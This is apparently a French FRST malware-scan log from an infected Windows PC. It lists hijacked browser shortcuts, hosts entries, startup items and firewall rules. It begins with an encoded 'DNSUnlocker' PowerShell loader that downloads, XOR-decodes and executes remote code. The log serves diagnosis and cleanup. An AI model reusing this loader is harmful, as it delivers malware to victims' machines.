ZwBMAF8AQgAxAHoAbQBmAGUAWQBFADUAawBGAEQAdQBmAHEARABJAGsASQBNAG8ARABLAFMANwBzAHYAaAB0ADgAZABVAFgAbgBsAHgAZQA5ADQAUQBRAGcARwA3AEsAYwA5AHoASwBjAG0AagBWAFcAQQA3AHoAbQBZAGQATQBrAFoARQBvAFIAbgB2AGMAeQBLAHYAQwBDAE4AVgBnAFEAMABQAGkAMgBTAGsARABKAFkAUwB3AE0AUABSAHMASwBLAF8AbwBSAFYAcABjADMAUQB2AGsALQBBAEoAWQBkAGwANAA4AHAAMQBjADAAWgBnAEoAYgBPAHIAcwByAEMAMwBMAFMAYgA3AFUAdwA0AGIAegAwADYAcgB4ADMAcQBfAEIATgBoAGQAcQBsAHUAagB5AHMALQB5AGgATgBjAGoAYgBmAEEAVABKAC0AQgA0AG4AbABvAFQAUwB2AGMASQA5AHYAWgBXADkASABxADkAWABFAHAANgBpAEsALQBpAFgASwBfAHEAcgBGAGIATwBmAGkAbgBhAFQAWQBlAE4AaABiADUAQwBjAG4AWQB2AGIAMwA3AGwAagBSAF8AUQBHAFgAagBTAHIAaQBrADcAVgBPAHkATQBQADUAQQA3AGEASgBXAEUAbgAzADcARwAtAEgAeABMAEgAcAA1AFUASABoADMAWABwADIASgBWAFcARQBOADgAZAAzAFMAUABSAFoAcwBQAGoAQgBLAGQAdABlADcAegBGAFAAOABZADIAegB3AFgAVQBXAEYAcgB3AEYAawByAHMAcQBEAEcARgBIAHoAVABFAG4AQgAyAGcARABsAHoAMwB3AFUAQQBkAFQAeQByAF8ARgAzAG4ATwBJADkATwBKAFoAbABJAFgAbgA1ADMARgA4AFkAZABmAEkAeQBxADAAMQA3AEgAZQA3AFgAcABhAG0AMwAxAHEAWQBDAFQARQBnAHMAdQB6AFoAQwB6AHcAMwBDAEcAXwBnAHgAQQBOADMAbwAtAEsAbQBKADkAawB2AG4AbgB4ADAAWAB1AHcAeQBmADQAbQBhAHUAaAB3AEwANwBlAC0AZwBEADgASQBEAGkAdQB4AHcAYgBOAHEARgBZAE4AQwBOAE8AUQBKAGgAMABnAGgAVAB3ADIASgB6AGcAcAB0ADQASgBhAHUAZAAxAGcAZQAxAEgAUQBwAGYAOABlADMARwBVAGYAUAAxAEMAcwBiAEwAUQBVAEMATQBWAHYALQBkAF8AUAAtAGoAZQBBAGQAbgBxAE8ARwB6AEgARQBpAEYAcwA2AEEAdABXAEMAVwAzAE0AOQB4AE4AVQBCAG4AbwBRAC0AcQBZAGUAVgBNAEEARwBXAG4AVQB4AFIATgBRAEsAaQBVAEQALQBSAEEAWQA2AGcAcwBhAEQARgBKAFQAZQBMAGcAbwBmADcAQgBYAFYALQBaADgAbgAzADUAdQBNADgAYQBDAEIAYgBXAFIAbABGAFQAdQBHAFoAZABvAE4ANABEAFcARgBRAF8ANwB4AFYAVwBZAGoATQBaADkAdwBOAHQAQQB2AGQARQBSAEUARgBEAGMANwBzADkAbABHAHMAVgA2ADIAXwAwADMAcAAzAFMAOQB3AHMAbwBlAEYAbQByAEUAUQBEAGcANABlAEcAUQBkAHEAcABnAGwARgA4AHQAMgBfAHYASABZAHQAdABwAGQAMwBsADMAOQBvAFQAZQB1AHYAVABpAEYASgA4AE4AeABLAEgAaQB6AFcALQBrADIAUwBxAFYAZwBkAEsAaAB3AHUAdABDAEUARABEAF8AOAAzAGMAagBCADkAZABFADAAMABoAGIAdgBPADUANABIAC0AVgBvAGIAaQBqAEQARwBuAFcAOQBhAHgAYQBjADMAVABSADIAdgAxAEkAagBfAEUASAB4AHYASwBsAHkANQBrACYAYwA9AHgAVQA3AGsAVABWAHEAeQBVAHYAZQBWAHAAdwBTAHIAaQBGAG0ALQAtAEQAQgBuAHIAagAyAHAAeABiAGsAdwBtAGoASQBFAGEAMgB6AE8AUgBSAFUAYgA0AGwANgBFADkASQBBAGQAVQBCAFoALQBQAHkAUQB2ADIAeABvAFcAdwBIADkAbAA3AEQAVQBKAE0ANgA2AGEAdgB4AGoAUgBzADAAVABkADIAegBZADEANQBkAEUAUwBJAGYAWgBIAE4AVgBiAHgANQBJADIAeQBuAEQAbAB1AGkAUwBwAE8ARQBWAGQASABSAHcALQBuAGUAcQBCAG0AbABmADIARwBIADIAbgA3AHIATABxAEwAdwBCAFMARgBBAFcASgBkAGYAVAB5AHcAMwBYAGsAcgBJAEwAbwBPAEQAZQBiAHYAbwB3AF8AMAByAGsATgAzAGwAeABRAEMARwBBAHEAZQBwAFYAYQBqAHIASwB4AGkASABQAEgAZwA5AGUAUwAzADQAMwBhAG8AMABWAGoAdgBaAEkARABTAFAAdQByAGoAUwAzAGQAOAB6AFIAaABjAHoAZgBDAGcAQwBsAGgAZAB2AHIARgBSAF8AdgBpAFEARABvAE8AcQAyAGMAdgAwAFIATAAyAGEARAB6AEkAbgAzAGgAbwBIADMAVgBtAFQAUABnAEYAdQBIADcANgBtAG8AcQBmAEcAUwB3AFEAVQBpAHMATABSAGgASwBBAFYANABRAFUAawBWADUAWAA3ADEAVgBzAEIAbwBDAEwASABSAFQAYgBaAHkAUwAyAGQAVgA2AGMASABuADEAVABCAEYAcgBZADcAVABJAEkAeQBhAHQAagBxAHIALQB6AFUAeQBNAC0ALQB0AGQAZgBKAFMAYQBOAFoAMABSAFUAeQBLAEoAZABtAHYAWgBhAFoAVQBNAEIAOQAxAGMAYQBHAFQAVAAwAEkAbABHAE8AVwBjAEwAagBCAG8AUQBpAGsAQgBhADIAZwAxAFIAbwBrADYANgByAE4AUwBFAE4ARwBuAFQATgBBAE4ALQBGAEsAeQAyAFEAQgAtAEMAOQBnAEYATwB0AGsARQBVAGMAQwBGAFAANABvAF8AUABYAFcAWABKAEwATgBBAHIAaQAxAHUAMQBDAEkAeABuAGMATQBQAEEAQgBBAE0AUgBWAHUAUwBVAE8ASgBWAE0AUABlAGEAWABTAE0AaQA1AGgAcwBFAHIAdgBjAHoARgBpAG4AVABQAHQANgAzAHIAYgBoADgAWQB2AGkASAB2AEsAWgBwAFAAZABBAGsAWgBhAFkASAAyAHoASABQAG8AcQAtAEQALQB5AEkANwBXAHoAdwBxAEoAQQBNAGoAVABjAGIAYwBpAHAAdABjAGcASgBRAGMANgBiADgAYQBvADMARAAtAGMAWgBoAEUAZABrAFkAMgBUADcAdgAzAFAAMQBmAGcAVABlAHkAZwAxAHgAYgByAFgAaAA0AFIAVABfAGYAcABaADcARgBUAFgAcABzAHQAUwBTAFEAagB4AC0AOABaAEMAagBuADYAWQBpAGQAegBOAHUAdAByADQANwBfAGgAVgA4AEkAOQBJAGYAawBFAFQAVQA3AF8AbgBXAFMASwBEAHIAdABqAE4AYgBvADUAXwBSAE0AdABaAC0ATQB5AGQAOQBiAEIAcwBVAEwARAB6ADAATQBUAHQAawB5AF8AUABHAE0ANQBYAEoAcQBNAGkAcQBYAGcAdgBiAGIAcwBDAG4ASwB6AGgAWABCAGYARQA5AE4ANwBBAHkAMQBwAGUAMABtAFgAYwBsAEEAOABxAF8AbQBBAHkAVQBWAHUAZQAzAEMAaQA1AEkAbgA2AHoAYgAwAGUAWgBmAHMARgBDAE8AbQBEADQANAA2AFQAcgB0AHkAMQBUAFUAagBwADQATQBoAGIAaQAyAFMATgAxADQAagBFAEkAcgBUAG4AbwByAEcAUgBSAGIATQB3AHoAdABwAFMANQBiAFoAcgBXAHcAMAAzAF8AWgBKAEYAcQAwADcAMAAyAHYAeQBoAEcANgBlADMATQA2AEYAaABtAFEAdQBuAFYAawA5AGIARgBCAEoARgBsADMAQgA5AEwAOQBDAHkAMABHAFAAQQBIAEkAaQBrAHIAVwBFAEEAVgBwAG0ASABSAFYANgBVAFIARABHAFoAQwAxAFgAeABqAHoAbwA4AEwALQBaADUAdABsADQAUgBPAEYAZAB0AG0AeABhADMAbwBzAHUAMwB3AE4ANwBIAG4AUQA5AEQAbQBUAEcANABYAGcAYQBZAHQAVgBjAC0AUAAmAHIAPQAyADUANgAxADUANwAwADQANwAyADcAOQAxADcAMwAyADgANgAzACIAOwAkAHMAdABzAGsAPQAiAHsANwBEADAARAAwAEMANAA3AC0AMAA5ADcARAAtADAAQQA3AEYALQAwAEMAMQAxAC0AMABBADAANQA3AEYAMAA1ADEAMQAwADUAfQAiADsAJABwAHIAaQBkAD0AIgBEAE4AUwBVAG4AbABvAGMAawBlAHIAIgA7ACQAaQBuAGkAZAA9ACIASgBLAEYARABBAEwASABKACIAOwB0AHIAeQB7AGkAZgAoACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4ALgBNAGEAagBvAHIAIAAtAGwAdAAgADIAKQB7AGIAcgBlAGEAawA7AH0AJAB2AD0AWwBTAHkAcwB0AGUAbQAuAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBPAFMAVgBlAHIAcwBpAG8AbgAuAFYAZQByAHMAaQBvAG4AOwAKAGkAZgAoACQAdgAuAE0AYQBqAG8AcgAgAC0AZQBxACAANQApAHsAaQBmACgAKAAkAHYALgBNAGkAbgBvAHIAIAAtAGwAdAAgADIAKQAgAC0AQQBOAEQAIAAoACgARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBTAGUAcgB2AGkAYwBlAFAAYQBjAGsATQBhAGoAbwByAFYAZQByAHMAaQBvAG4AIAAtAGwAdAAgADIAKQApAHsAYgByAGUAYQBrADsAfQB9AAoAaQBmACgALQBOAE8AVAAgACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAUAByAGkAbgBjAGkAcABhAGwAXQBbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBJAGQAZQBuAHQAaQB0AHkAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdAAoACkAKQAuAEkAcwBJAG4AUgBvAGwAZQAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEIAdQBpAGwAdABJAG4AUgBvAGwAZQBdACAAIgBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByACIAKQApAHsAYgByAGUAYQBrADsAfQAKAGYAdQBuAGMAdABpAG8AbgAgAHcAYwAoACQAdQByAGwAKQB7ACQAcgBxAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAcgBxAC4AVQBzAGUARABlAGYAYQB1AGwAdABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAPQAkAHQAcgB1AGUAOwAkAHIAcQAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACIAdQBzAGUAcgAtAGEAZwBlAG4AdAAiACwAIgBNAG8AegBpAGwAbABhAC8ANAAuADAAIAAoAGMAbwBtAHAAYQB0AGkAYgBsAGUAOwAgAE0AUwBJAEUAIAA3AC4AMAA7ACAAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAKQAiACkAOwByAGUAdAB1AHIAbgAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAByAHEALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAdQByAGwAKQApADsAfQAKAGYAdQBuAGMAdABpAG8AbgAgAGQAcwB0AHIAKAAkAHIAYQB3AGQAYQB0AGEAKQB7ACQAYgB0AD0AWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHIAYQB3AGQAYQB0AGEAKQA7ACQAZQB4AHQAPQAkAGIAdABbADAAXQA7ACQAawBlAHkAPQAkAGIAdABbADEAXQAgAC0AYgB4AG8AcgAgADEANwAwADsAZgBvAHIAKAAkAGkAPQAyADsAJABpACAALQBsAHQAIAAkAGIAdAAuAEwAZQBuAGcAdABoADsAJABpACsAKwApAHsAJABiAHQAWwAkAGkAXQA9ACgAJABiAHQAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACgAKAAkAGsAZQB5ACAAKwAgACQAaQApACAALQBiAGEAbgBkACAAMgA1ADUAKQApADsAfQAKAHIAZQB0AHUAcgBuACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEQAZQBmAGwAYQB0AGUAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACQAYgB0ACwAMgAsACgAJABiAHQALgBMAGUAbgBnAHQAaAAtACQAZQB4AHQAKQApACkALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwB9AAoAJABzAGMAPQBkAHMAdAByACgAdwBjACgAJABzAHUAcgBsACkAKQA7AEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgAC0AYwBvAG0AbQBhAG4AZAAgACIAJABzAGMAIgA7AH0AYwBhAHQAYwBoAHsAfQA7AGUAeABpAHQAIAAwADsA (Si un élément est inclus dans le fichier fixlist.txt, le fichier tâche (.job) sera déplacé. Le fichier exécuté par la tâche ne sera pas déplacé.) Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe Task: C:\WINDOWS\Tasks\FacebookUpdateTaskUserS-1-5-21-3859349222-1854191734-3556633951-1001Core.job => C:\Users\Famille\AppData\Local\Facebook\Update\FacebookUpdate.exe Task: C:\WINDOWS\Tasks\FacebookUpdateTaskUserS-1-5-21-3859349222-1854191734-3556633951-1001UA.job => C:\Users\Famille\AppData\Local\Facebook\Update\FacebookUpdate.exe Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\WINDOWS\Tasks\HPCeeScheduleForFamille.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe ==================== Raccourcis ============================= (Les éléments sont susceptibles d'être inscrits dans le fichier fixlist.txt afin d'être supprimés ou restaurés.) ShortcutWithArgument: C:\Users\Famille\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www%2dsearching.com/?prd=set_epc&s=G29zbwybl01,0a48bfbb-f470-447f-b0b5-a5b8d47fd6d1, ShortcutWithArgument: C:\Users\Famille\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet-Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www%2dsearching.com/?prd=set_epc&s=G29zbwybl01,0a48bfbb-f470-447f-b0b5-a5b8d47fd6d1, ShortcutWithArgument: C:\Users\Famille\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Microsoft Edge.lnk -> C:\Windows\explorer.exe (Microsoft Corporation) -> "microsoft-edge:hxxp://www%2dsearching.com/?prd=set_epc&s=G29zbwybl01,0a48bfbb-f470-447f-b0b5-a5b8d47fd6d1," ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www%2dsearching.com/?prd=set_epc&s=G29zbwybl01,0a48bfbb-f470-447f-b0b5-a5b8d47fd6d1, --disable-quic ==================== Modules chargés (Avec liste blanche) ============== 2015-10-30 08:18 - 2015-10-30 08:18 - 00185856 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll 2015-12-27 04:56 - 2015-12-27 04:56 - 02653816 _____ () C:\WINDOWS\system32\CoreUIComponents.dll 2015-12-27 04:56 - 2015-12-27 04:56 - 02653816 _____ () C:\WINDOWS\System32\CoreUIComponents.dll 2016-01-22 09:20 - 2016-01-22 09:33 - 00144384 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeHost.exe 2015-12-27 04:57 - 2015-12-27 04:57 - 00093696 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\Windows.UI.Shell.SharedUtilities.dll 2015-12-27 04:57 - 2015-12-27 04:57 - 00472064 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll 2012-11-27 14:13 - 2012-11-27 14:13 - 00561320 _____ () C:\Program Files (x86)\Orange\Orange Installer\OrangeInstaller.exe 2015-08-21 22:09 - 2015-08-21 22:09 - 00102400 _____ () C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Proxy.Native.dll 2016-01-13 22:38 - 2016-01-05 02:29 - 07992832 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll 2016-01-13 22:38 - 2016-01-05 02:23 - 00591360 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll 2016-01-27 23:13 - 2016-01-16 06:10 - 02483200 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll 2016-01-27 23:14 - 2016-01-16 06:13 - 04089856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll 2016-01-22 09:20 - 2016-01-22 09:33 - 00141312 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeBackgroundTasks.dll 2016-01-22 09:20 - 2016-01-22 09:33 - 22330368 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkyWrap.dll 2011-09-15 06:52 - 2011-09-15 06:52 - 00118784 _____ () C:\Program Files (x86)\Orange\Orange Installer\libgcc_s_dw2-1.dll 2011-09-15 06:52 - 2011-09-15 06:52 - 00978958 _____ () C:\Program Files (x86)\Orange\Orange Installer\libstdc++-6.dll 2015-07-02 16:35 - 2015-07-02 16:35 - 40540672 _____ () C:\Program Files\AVAST Software\Avast\libcef.dll 2015-07-02 16:35 - 2015-07-02 16:35 - 00104400 _____ () C:\Program Files\AVAST Software\Avast\log.dll 2015-07-02 16:35 - 2015-07-02 16:35 - 00081728 _____ () C:\Program Files\AVAST Software\Avast\JsonRpcServer.dll 2016-02-05 03:34 - 2016-02-03 08:27 - 01632584 _____ () C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.103\libglesv2.dll 2016-02-05 03:34 - 2016-02-03 08:27 - 00087880 _____ () C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.103\libegl.dll 2012-11-15 16:52 - 2012-11-15 16:52 - 00020480 _____ () C:\Program Files (x86)\Orange\Assistance Livebox\dist\rt\bin\jetvm\jvm.dll 2012-11-15 16:52 - 2012-11-15 16:52 - 00069632 _____ () C:\Program Files (x86)\Orange\Assistance Livebox\dist\rt\bin\java.dll 2012-11-15 16:52 - 2012-11-15 16:52 - 00126976 _____ () C:\Program Files (x86)\Orange\Assistance Livebox\dist\rt\bin\zip.dll 2012-11-15 16:52 - 2012-11-15 16:52 - 00159744 _____ () C:\Program Files (x86)\Orange\Assistance Livebox\dist\rt\jetrt\baseline720.dll 2012-11-15 16:52 - 2012-11-15 16:52 - 00131584 _____ () C:\Program Files (x86)\Orange\Assistance Livebox\dist\NetworkAPI.dll 2012-11-15 16:52 - 2012-11-15 16:52 - 00019456 _____ () C:\Program Files (x86)\Orange\Assistance Livebox\dist\NetWPSAPI.dll 2012-11-15 16:52 - 2012-11-15 16:52 - 00151552 _____ () C:\Program Files (x86)\Orange\Assistance Livebox\dist\Tools.DLL 2016-02-05 03:34 - 2016-02-03 08:27 - 16799048 _____ () C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.103\PepperFlash\pepflashplayer.dll ==================== Alternate Data Streams (Avec liste blanche) ========= (Si un élément est inclus dans le fichier fixlist.txt, seul le flux de données additionnel (ADS - Alternate Data Stream) sera supprimé.) ==================== Mode sans échec (Avec liste blanche) =================== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le "AlternateShell" sera restauré.) ==================== EXE Association (Avec liste blanche) =============== (Si un élément est inclus dans le fichier fixlist.txt, l'élément de Registre sera restauré à la valeur par défaut ou supprimé.) ==================== Internet Explorer sites de confiance/sensibles =============== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre.) IE trusted site: HKU\S-1-5-21-3859349222-1854191734-3556633951-1001\...\ma-config.com -> hxxp://ma-config.com IE trusted site: HKU\S-1-5-21-3859349222-1854191734-3556633951-1001\...\ma-config.com -> hxxps://ma-config.com IE trusted site: HKU\S-1-5-21-3859349222-1854191734-3556633951-1001\...\touslesdrivers.com -> hxxp://touslesdrivers.com ==================== Hosts contenu: ========================== (Si nécessaire, la commande Hosts: peut être incluse dans le fichier fixlist.txt afin de réinitialiser le fichier hosts.) 2013-08-22 14:25 - 2016-02-08 16:08 - 00000967 ____A C:\WINDOWS\system32\Drivers\etc\hosts 127.0.0.1 down.baidu2016.com 127.0.0.1 123.sogou.com 127.0.0.1 www.czzsyzgm.com 127.0.0.1 www.czzsyzxl.com ==================== Autres zones ============================ (Actuellement, il n'y a pas de correction automatique pour cette section.) HKU\S-1-5-21-3859349222-1854191734-3556633951-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Famille\AppData\Local\Microsoft\Windows\Themes\transcodedwallpaper DNS Servers: 192.168.1.1 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) Le Pare-feu est activé. ==================== MSCONFIG/TASK MANAGER éléments désactivés == (Actuellement, il n'y a pas de correction automatique pour cette section.) HKLM\...\StartupApproved\Run: => "3D BubbleSound" HKLM\...\StartupApproved\Run: => "IDSCPRODUCT" HKLM\...\StartupApproved\Run32: => "SunJavaUpdateSched" HKLM\...\StartupApproved\Run32: => "APSDaemon" HKLM\...\StartupApproved\Run32: => "iTunesHelper" HKLM\...\StartupApproved\Run32: => "freeSoftToday_widget" HKLM\...\StartupApproved\Run32: => "DivXMediaServer" HKLM\...\StartupApproved\Run32: => "HP Software Update" HKLM\...\StartupApproved\Run32: => "YTDownloader" HKU\S-1-5-21-3859349222-1854191734-3556633951-1001\...\StartupApproved\StartupFolder: => "OpenOffice.org 3.4.1.lnk" HKU\S-1-5-21-3859349222-1854191734-3556633951-1001\...\StartupApproved\Run: => "Facebook Update" HKU\S-1-5-21-3859349222-1854191734-3556633951-1001\...\StartupApproved\Run: => "Orange Installer" HKU\S-1-5-21-3859349222-1854191734-3556633951-1001\...\StartupApproved\Run: => "OrangeInside" HKU\S-1-5-21-3859349222-1854191734-3556633951-1001\...\StartupApproved\Run: => "msnmsgr" HKU\S-1-5-21-3859349222-1854191734-3556633951-1001\...\StartupApproved\Run: => "iFunBox Fast App Install Handler" HKU\S-1-5-21-3859349222-1854191734-3556633951-1001\...\StartupApproved\Run: => "Skype" HKU\S-1-5-21-3859349222-1854191734-3556633951-1001\...\StartupApproved\Run: => "Steam" HKU\S-1-5-21-3859349222-1854191734-3556633951-1001\...\StartupApproved\Run: => "Selection Tools" HKU\S-1-5-21-3859349222-1854191734-3556633951-1001\...\StartupApproved\Run: => "WindApp" HKU\S-1-5-21-3859349222-1854191734-3556633951-1001\...\StartupApproved\Run: => "YTDownloader" HKU\S-1-5-21-3859349222-1854191734-3556633951-1001\...\StartupApproved\Run: => "C" HKU\S-1-5-21-3859349222-1854191734-3556633951-1001\...\StartupApproved\Run: => "BoBrowser" ==================== RèglesPare-feu (Avec liste blanche) =============== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139 FirewallRules: [{EBA7E9EC-6015-4695-BF62-278F47B089D6}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe FirewallRules: [{4040CD9D-4673-4FC5-9D29-099865AF0641}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe FirewallRules: [{53E5B115-B1F1-49EF-97E1-84F623576C78}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe FirewallRules: [{D7C5B681-84AA-4A3E-A659-7BDD3E56CA4A}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe FirewallRules: [UDP Query User{CB4A4080-02AC-495A-86DE-40837C156A45}C:\users\famille\appdata\roaming\utorrent\updates\3.4.5_41372.exe] => (Block) C:\users\famille\appdata\roaming\utorrent\updates\3.4.5_41372.exe FirewallRules: [TCP Query User{2F0D8A4A-6A3E-4756-A84C-84595337C42B}C:\users\famille\appdata\roaming\utorrent\updates\3.4.5_41372.exe] => (Block) C:\users\famille\appdata\roaming\utorrent\updates\3.4.5_41372.exe FirewallRules: [UDP Query User{08EDC9B3-37E9-40BD-BD4C-0BEB941D0C5B}C:\users\famille\appdata\roaming\utorrent\updates\3.4.5_41202.exe] => (Block) C:\users\famille\appdata\roaming\utorrent\updates\3.4.5_41202.exe FirewallRules: [TCP Query User{78398E0C-C89D-4284-8CD0-F3A494A1F28A}C:\users\famille\appdata\roaming\utorrent\updates\3.4.5_41202.exe] => (Block) C:\users\famille\appdata\roaming\utorrent\updates\3.4.5_41202.exe FirewallRules: [UDP Query User{9AECCF58-3139-4071-8146-3F658C6E9E5B}C:\users\famille\appdata\roaming\utorrent\updates\3.4.5_41162.exe] => (Block) C:\users\famille\appdata\roaming\utorrent\updates\3.4.5_41162.exe FirewallRules: [TCP Query User{FC6F96EA-6F83-4AD3-A978-4480C2E47F8A}C:\users\famille\appdata\roaming\utorrent\updates\3.4.5_41162.exe] => (Block) C:\users\famille\appdata\roaming\utorrent\updates\3.4.5_41162.exe FirewallRules: [UDP Query User{A993BCA6-2F5E-485D-87BD-758C422CBAF7}C:\users\famille\appdata\roaming\utorrent\updates\3.4.5_41073.exe] => (Block) C:\users\famille\appdata\roaming\utorrent\updates\3.4.5_41073.exe FirewallRules: [TCP Query User{3ACE7471-41A4-43A8-B7A2-D1CC27990FC4}C:\users\famille\appdata\roaming\utorrent\updates\3.4.5_41073.exe] => (Block) C:\users\famille\appdata\roaming\utorrent\updates\3.4.5_41073.exe FirewallRules: [{A9F5FA9D-EB95-4C27-AF01-26A882631443}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPDeviceDetection3.exe FirewallRules: [UDP Query User{3D71D55E-0D42-4559-BDBB-D7DFEDB19F89}C:\program files (x86)\skype\phone\skype.exe] => (Block) C:\program files (x86)\skype\phone\skype.exe FirewallRules: [TCP Query User{6A1F9CC7-1EC3-4076-9457-594D43DFBCB7}C:\program files (x86)\skype\phone\skype.exe] => (Block) C:\program files (x86)\skype\phone\skype.exe FirewallRules: [UDP Query User{23284E22-1798-472F-BDF3-F5CE3F6C4072}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe FirewallRules: [TCP Query User{23B43EA9-1B17-49C1-A6FA-018CF74145CA}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe FirewallRules: [UDP Query User{8C92A820-0B4E-4086-A1BA-E58EF58FB698}C:\program files (x86)\orange\assistance livebox\dist\st2.exe] => (Block) C:\program files (x86)\orange\assistance livebox\dist\st2.exe FirewallRules: [TCP Query User{A17978E7-9465-4B03-A892-D03AFD036A26}C:\program files (x86)\orange\assistance livebox\dist\st2.exe] => (Block) C:\program files (x86)\orange\assistance livebox\dist\st2.exe FirewallRules: [{8915C5CE-0599-455A-BD88-B866209BAEAD}] => (Allow) C:\Program Files (x86)\iTunes\iTunes.exe FirewallRules: [{6E33D83C-FF28-42D3-B28D-9EBA7726026E}] => (Allow) C:\Users\Famille\AppData\Local\Facebook\Video\Skype\FacebookVideoCalling.exe FirewallRules: [{94BD1575-39AF-4D36-A887-CF633B6C9254}] => (Allow) C:\Program Files (x86)\HP\hp software update\hpwucli.exe FirewallRules: [{63128600-B54B-4F68-9D17-5D6CAB944B7F}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqusgh.exe FirewallRules: [{122D77A4-452D-48A0-BF70-09E7E5248720}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqusgm.exe FirewallRules: [{B43767E8-9FE0-48C9-B313-75DF513E3387}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqgpc01.exe FirewallRules: [{43CA0728-06E9-4768-A6D6-F2DFB898FBAF}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqgplgtupl.exe FirewallRules: 